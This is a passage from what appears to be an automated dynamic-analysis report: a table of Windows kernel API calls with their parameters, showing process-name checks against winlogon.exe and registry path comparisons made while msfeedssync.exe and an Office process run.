| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x14, ret_val_ptr_out = 0xffffe0003c634190 |
| _wcsicmp | _String1 = ULSTagIds, _String2 = ImagePath, ret_val_out = 12 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
Execution Path #161 (length: 3012, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 3012 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xea, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe8, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xe8, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Security, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Security | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Internet Explorer\Security, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -14 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x90, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x90, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xea, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe8, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0xe8, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Security, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Internet Explorer\Security | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Internet Explorer\Security, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -14 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x90, ret_val_ptr_out = 0xffffe0003a77c870 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x90, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x116, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x114, ret_val_ptr_out = 0xffffe0003a769ee0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x114, ObjectNameInfo_unk_out = 0xffffe0003a769ee0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769ee0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbc, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xbc, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
